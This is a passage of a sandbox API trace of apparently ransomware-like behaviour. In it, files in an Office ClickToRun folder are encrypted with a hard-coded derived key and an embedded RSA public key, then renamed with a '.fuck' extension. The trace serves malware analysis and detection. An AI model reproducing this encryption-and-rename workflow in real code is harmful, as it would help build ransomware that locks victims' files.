PublicKey.cbData=0x8c, PublicKey.pbData=0x280a208*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x394be8) returned 1 [0236.376] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.376] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ffd38*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ffd38*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.376] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ffd38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.376] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279c798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279c798, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.376] CryptEncrypt (in: hKey=0x394b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279c798*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279c798*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.376] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279c798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.377] CloseHandle (hObject=0xffffffff) returned 1 [0236.377] CloseHandle (hObject=0xffffffff) returned 1 [0236.377] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.377] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.377] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.378] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.378] CryptDestroyHash (hHash=0x27175e8) returned 1 [0236.378] CryptDestroyKey (hKey=0x394b28) returned 1 [0236.378] CryptReleaseContext (hProv=0x27ffe48, dwFlags=0x0) returned 1 [0236.378] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.378] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.378] GetLastError () returned 0x5 [0236.379] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml")) returned 0x20 [0236.379] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.380] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.380] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.380] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.381] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fef68) returned 1 [0236.385] CryptCreateHash (in: hProv=0x27fef68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.385] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.385] CryptHashData (hHash=0x27175e8, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.385] CryptDeriveKey (in: hProv=0x27fef68, Algid=0x6610, hBaseData=0x27175e8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0236.385] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.385] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.385] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9438) returned 1 [0236.386] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9438, dwCertEncodingType=0x1, pInfo=0x280a030*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a060*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a068*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27ebce0) returned 1 [0236.386] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.387] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e94c0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e94c0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.387] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e94c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.387] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.387] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.387] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.387] CloseHandle (hObject=0xffffffff) returned 1 [0236.387] CloseHandle (hObject=0xffffffff) returned 1 [0236.387] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.388] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.388] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.gsg")) returned 0 [0236.389] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.fuck")) returned 0 [0236.389] CryptDestroyHash (hHash=0x27175e8) returned 1 [0236.389] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0236.389] CryptReleaseContext (hProv=0x27fef68, dwFlags=0x0) returned 1 [0236.389] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.389] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.389] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.389] GetLastError () returned 0x5 [0236.389] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml")) returned 0x20 [0236.390] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml", dwFileAttributes=0x80) returned 0 [0236.390] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.390] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.391] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.391] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ffdc0) returned 1 [0236.396] CryptCreateHash (in: hProv=0x27ffdc0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.396] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.396] CryptHashData (hHash=0x27175e8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.396] CryptDeriveKey (in: hProv=0x27ffdc0, Algid=0x6610, hBaseData=0x27175e8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x394b28) returned 1 [0236.396] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.396] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.396] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ffe48) returned 1 [0236.398] CryptImportPublicKeyInfo (in: hCryptProv=0x27ffe48, dwCertEncodingType=0x1, pInfo=0x2809b50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809b80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809b88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27ebc60) returned 1 [0236.398] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.398] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2800068*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2800068*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.398] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2800068, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.398] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.398] CryptEncrypt (in: hKey=0x394b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.398] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.398] CloseHandle (hObject=0xffffffff) returned 1 [0236.398] CloseHandle (hObject=0xffffffff) returned 1 [0236.399] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml"), bFailIfExists=0) returned 0 [0236.399] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml", dwFileAttributes=0x0) returned 0 [0236.399] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.gsg")) returned 0 [0236.400] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.fuck")) returned 0 [0236.400] CryptDestroyHash (hHash=0x27175e8) returned 1 [0236.400] CryptDestroyKey (hKey=0x394b28) returned 1 [0236.400] CryptReleaseContext (hProv=0x27ffdc0, dwFlags=0x0) returned 1 [0236.400] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.400] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.400] GetLastError () returned 0x5 [0236.400] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml")) returned 0x20 [0236.401] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml", dwFileAttributes=0x80) returned 0 [0236.402] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.402] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.402] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.403] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e9548) returned 1 [0236.408] CryptCreateHash (in: hProv=0x27e9548, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.408] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.408] CryptHashData (hHash=0x27170a8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.408] CryptDeriveKey (in: hProv=0x27e9548, Algid=0x6610, hBaseData=0x27170a8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x394b28) returned 1 [0236.408] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.408] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.408] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ffdc0) returned 1 [0236.409] CryptImportPublicKeyInfo (in: hCryptProv=0x27ffdc0, dwCertEncodingType=0x1, pInfo=0x2809670*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28096a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28096a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817258) returned 1 [0236.409] CryptEncrypt (in: hKey=0x2817258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.409] CryptEncrypt (in: hKey=0x2817258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fef68*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fef68*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.409] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fef68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.409] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.410] CryptEncrypt (in: hKey=0x394b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.410] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.410] CloseHandle (hObject=0xffffffff) returned 1 [0236.410] CloseHandle (hObject=0xffffffff) returned 1 [0236.410] 